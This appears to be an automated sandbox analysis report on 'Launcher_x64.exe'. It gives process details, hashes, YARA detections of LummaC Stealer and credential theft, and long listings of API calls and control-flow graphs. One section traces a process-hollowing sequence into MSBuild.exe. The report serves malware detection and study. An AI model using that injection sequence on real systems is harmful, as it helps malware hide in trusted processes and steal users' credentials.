                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xETsEUYmbJGt6ozXMCH82t9dwzkPREB%2FaPnm0Q3ROUT9XptmdBzXDRbZOGzgrVIRAGs%2FRi1jeOast6enT7oS3E8hTre953whn9LpdHCrDGs2JNxYpE4C0JcNr7n3o6gQJyc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642cb44dab0f95-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1644&rtt_var=623&sent=312&recv=595&lost=0&retrans=0&sent_bytes=2834&recv_bytes=567473&delivery_rate=1748502&cwnd=169&unsent_bytes=0&cid=f8421cea7f3c1feb&ts=2922&x=0"


Target ID: 0
Start time: 19:17:03
Start date: 22/12/2024
Path: C:\Users\user\Desktop\Launcher_x64.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Launcher_x64.exe"
Imagebase: 0xd00000
File size: 575'488 bytes
MD5 hash: A467477E289901E8C45912F98FC56CD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 19:17:03
Start date: 22/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 19:17:04
Start date: 22/12/2024
Path: C:\Users\user\Desktop\Launcher_x64.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\Launcher_x64.exe"
Imagebase: 0xd00000
File size: 575'488 bytes
MD5 hash: A467477E289901E8C45912F98FC56CD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 19:17:04
Start date: 22/12/2024
Path: C:\Users\user\Desktop\Launcher_x64.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Launcher_x64.exe"
Imagebase: 0xd00000
File size: 575'488 bytes
MD5 hash: A467477E289901E8C45912F98FC56CD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.2556263712.0000000001093000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.2602917926.0000000001093000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.2555293768.0000000001093000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2530449435.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Execution Graph

Execution Coverage: 10.7%
Dynamic/Decrypted Code Coverage: 1.7%
Signature Coverage: 3.1%
Total number of Nodes: 521
Total number of Limit Nodes: 6

Control-flow Graph

APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00D3F110,00D3F100), ref: 00D3F334
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00D3F347
• Wow64GetThreadContext.KERNEL32(00000238,00000000), ref: 00D3F365
• ReadProcessMemory.KERNELBASE(00000234,?,00D3F154,00000004,00000000), ref: 00D3F389
• VirtualAllocEx.KERNELBASE(00000234,?,?,00003000,00000040), ref: 00D3F3B4
• TerminateProcess.KERNELBASE(00000234,00000000), ref: 00D3F3D3
• WriteProcessMemory.KERNELBASE(00000234,00000000,?,?,00000000,?), ref: 00D3F40C
• WriteProcessMemory.KERNELBASE(00000234,00400000,?,?,00000000,?,00000028), ref: 00D3F457
• WriteProcessMemory.KERNELBASE(00000234,?,?,00000004,00000000), ref: 00D3F495
• Wow64SetThreadContext.KERNEL32(00000238,00A50000), ref: 00D3F4D1
• ResumeThread.KERNELBASE(00000238), ref: 00D3F4E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2440066154-3857624555
• Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction ID: 045249823c58810deb4379e5bfa476f2152e717e5a6a14cfc1d4eb1940260b2c
• Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction Fuzzy Hash: B7B1F97664064AAFDB60CF68CC80BDA73A5FF88714F158124EA0CAB341D774FA51CBA4

Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,E7FA7683,?,00D24208,00D03E32,?,00000000,?), ref: 00D241BA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                                        • Opcode ID: e1b2a30326aca85056b474640c2694a1a7fb7e4afb5108da6d0e2efb620827e9
                                                                                                                                                                                                                                                                                        • Instruction ID: 085cc1d4ec07c4ecb6de441a293fa9104b3fba6893152b87d4fd31ec95b4c2e9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1b2a30326aca85056b474640c2694a1a7fb7e4afb5108da6d0e2efb620827e9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9721D235A01331ABD7229B65FC45A5A375ADF717A8F290220FD15E7390E630EE60CAB0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 42be21327a0a5c74ac7ec5dfa785c1521b9d48e6f2418f16775b72bb53d3b26d
                                                                                                                                                                                                                                                                                        • Instruction ID: 70404eaed23b885386260762f211daf3b616366ed547e8b94eb05bee4214a340
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42be21327a0a5c74ac7ec5dfa785c1521b9d48e6f2418f16775b72bb53d3b26d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C719EB4D05248CFDB00EFA8D58879DBBF0BF48304F14852AE899AB391D734A945CF62

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _strcspn
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 3709121408-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: c360125d38494724fadd780d9f32c0c235736ac8601505d4fc78935594ef1493
                                                                                                                                                                                                                                                                                        • Instruction ID: e8326018d1d9473a0fd6fdf1c772b1e66621cf0ea287dfa24a9357d628c3a0ff
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c360125d38494724fadd780d9f32c0c235736ac8601505d4fc78935594ef1493
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA32C4B49052698FDB14DF64C981B9DFBF1BF48300F0585AAE88DA7351D730AA85CFA1

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConsoleFreeProtectVirtual
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 621788221-2766056989

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(00D1C9E4,?,00D1CB99,00000000,?,?,00D1C9E4,E7FA7683,?,00D1C9E4), ref: 00D1CAE8
• TerminateProcess.KERNEL32(00000000,?,00D1CB99,00000000,?,?,00D1C9E4,E7FA7683,?,00D1C9E4), ref: 00D1CAEF
• ExitProcess.KERNEL32 ref: 00D1CB01
Memory Dump Source
• Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0

Control-flow Graph

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00D050DB
  • Part of subcall function 00D1277A: _Yarn.LIBCPMT ref: 00D1279A
  • Part of subcall function 00D1277A: _Yarn.LIBCPMT ref: 00D127BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
Similarity
• API ID: Yarn$LockitLockit::_std::_
• String ID: bad locale name
• API String ID: 360232963-1405518554

Control-flow Graph

APIs
  • Part of subcall function 00D2B0D7: GetConsoleOutputCP.KERNEL32(E7FA7683,00000000,00000000,?), ref: 00D2B13A
• WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00D1A691,?,00D1A8F3), ref: 00D2AEB2
• GetLastError.KERNEL32(?,00D1A691,?,00D1A8F3,?,00D1A8F3,?,?,?,?,?,?,?,?,?,?), ref: 00D2AEBC
Memory Dump Source
• Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
Similarity
• API ID: ConsoleErrorFileLastOutputWrite
• String ID:
• API String ID: 2915228174-0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 300 d2b506-d2b55b call d16c90 303 d2b5d0-d2b5e0 call d12303 300->303 304 d2b55d 300->304 305 d2b563 304->305 307 d2b569-d2b56b 305->307 309 d2b585-d2b5aa WriteFile 307->309 310 d2b56d-d2b572 307->310 313 d2b5c8-d2b5ce GetLastError 309->313 314 d2b5ac-d2b5b7 309->314 311 d2b574-d2b57a 310->311 312 d2b57b-d2b583 310->312 311->312 312->307 312->309 313->303 314->303 315 d2b5b9-d2b5c4 314->315 315->305 316 d2b5c6 315->316 316->303
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00D2AE98,?,00D1A8F3,?,?,?,00000000), ref: 00D2B5A2
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00D2AE98,?,00D1A8F3,?,?,?,00000000,?,?,?,?,?,00D1A691,?,00D1A8F3), ref: 00D2B5C8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 442123175-0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00D048DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D04D90: std::_Lockit::_Lockit.LIBCPMT ref: 00D04DBE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D04D90: std::_Lockit::~_Lockit.LIBCPMT ref: 00D04DE9
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00D049AB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 593203224-0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 347 d24c19-d24c1e 348 d24c20-d24c38 347->348 349 d24c46-d24c4f 348->349 350 d24c3a-d24c3e 348->350 352 d24c61 349->352 353 d24c51-d24c54 349->353 350->349 351 d24c40-d24c44 350->351 355 d24cbb-d24cbf 351->355 354 d24c63-d24c70 GetStdHandle 352->354 356 d24c56-d24c5b 353->356 357 d24c5d-d24c5f 353->357 358 d24c72-d24c74 354->358 359 d24c9d-d24caf 354->359 355->348 360 d24cc5-d24cc8 355->360 356->354 357->354 358->359 361 d24c76-d24c7f GetFileType 358->361 359->355 362 d24cb1-d24cb4 359->362 361->359 363 d24c81-d24c8a 361->363 362->355 364 d24c92-d24c95 363->364 365 d24c8c-d24c90 363->365 364->355 366 d24c97-d24c9b 364->366 365->355 366->355
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00D24B08,00D3EBC0), ref: 00D24C65
                                                                                                                                                                                                                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00D24B08,00D3EBC0), ref: 00D24C77
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3000768030-0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 367 d1277a-d127a4 call d20cd7 call d127e0 372 d127b0-d127c5 call d127e0 367->372 373 d127a6-d127a9 call d20cd7 367->373 376 d127ae-d127af 373->376 376->372
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Yarn
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1767336200-0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 00D01BC8
                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 00D01BE8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D01890: CreateFileA.KERNELBASE ref: 00D01913
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileModule$CreateHandleName
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2828212432-0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        control_flow_graph 383 d23187-d23190 384 d23192-d231a5 RtlFreeHeap 383->384 385 d231bf-d231c0 383->385 384->385 386 d231a7-d231be GetLastError call d1ebad call d1eb64 384->386 386->385
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,00D27421,?,00000000,?,?,00D270C1,?,00000007,?,?,00D27A07,?,?), ref: 00D2319D
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00D27421,?,00000000,?,?,00D270C1,?,00000007,?,?,00D27A07,?,?), ref: 00D231A8
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 485612231-0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        control_flow_graph 391 d14cf2-d14d17 392 d14d20-d14d28 391->392 393 d14d19-d14d1b 391->393 395 d14d50-d14d54 392->395 396 d14d2a-d14d34 392->396 394 d14e12-d14e1f call d12303 393->394 399 d14d5a-d14d69 call d153c3 395->399 400 d14e0c 395->400 396->395 398 d14d36-d14d4b 396->398 401 d14e11 398->401 405 d14d71-d14da6 399->405 406 d14d6b-d14d6f 399->406 400->401 401->394 412 d14dd2-d14dda 405->412 413 d14da8-d14dab 405->413 407 d14db9 call d14915 406->407 410 d14dbe-d14dd0 407->410 410->401 415 d14ddc-d14ded call d2088d 412->415 416 d14def-d14e0a 412->416 413->412 414 d14dad-d14db1 413->414 414->400 417 d14db3-d14db6 414->417 415->400 415->416 416->401 417->407
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 5ceee6d3c6af76ffef4f68b66ad0de1c60afbeda7056f87d3b0c6f9a6512b0a0
                                                                                                                                                                                                                                                                                        • Instruction ID: 99165ce48ec2d419f245d437f5d4f5074fbc157efb3ab80d0140aa212e3c06c9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ceee6d3c6af76ffef4f68b66ad0de1c60afbeda7056f87d3b0c6f9a6512b0a0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9831543250421ABFCF14DE68E9909E9B7B9BF19324B144259E551E3290EB31FA94CBB0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D12B03: GetModuleHandleExW.KERNEL32(00000002,00000000,00D0E5B1,?,?,00D12AC6,?,?,00D12A97,?,?,?,00D0E5B1), ref: 00D12B0F
                                                                                                                                                                                                                                                                                        • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,E7FA7683,?,?,?,00D33374,000000FF), ref: 00D12BF9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D0B920: std::_Throw_Cpp_error.LIBCPMT ref: 00D0B94C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D0B920: std::_Throw_Cpp_error.LIBCPMT ref: 00D0B968
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D15C60: ReleaseSRWLockExclusive.KERNEL32(?,?,?,00D0B9E9,?,00D0FD92), ref: 00D15C75
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Cpp_errorThrow_std::_$CallbackExclusiveFreeHandleLibraryLockModuleReleaseReturnsWhen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1423221283-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 00d0bfb197017cdc3e2b8fab2b2caee7a1dea897a2688ac5ff0c4c61b2a57752
                                                                                                                                                                                                                                                                                        • Instruction ID: 4f9d1d870565fa0be594443abda409f34fdcbd7f598f9806d96cc30c696d188c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00d0bfb197017cdc3e2b8fab2b2caee7a1dea897a2688ac5ff0c4c61b2a57752
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2111E236608644BBCB256F65FD01ABE7765EB41B20F18041AF905D67A4CF36E890CAB4
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: b7b217f8284b073c936573e7890dd5d407c4e02f94cd13fe9e2ba24bbaf42f2e
                                                                                                                                                                                                                                                                                        • Instruction ID: 09a9e1a31828f6dba7a97cb6ce362a21430134fb44950c710f578a4c1c4448cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7b217f8284b073c936573e7890dd5d407c4e02f94cd13fe9e2ba24bbaf42f2e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C01D2372003249F8B028E69FC40A26376AFF96328B254124FA00CB254DA30E8408AB5
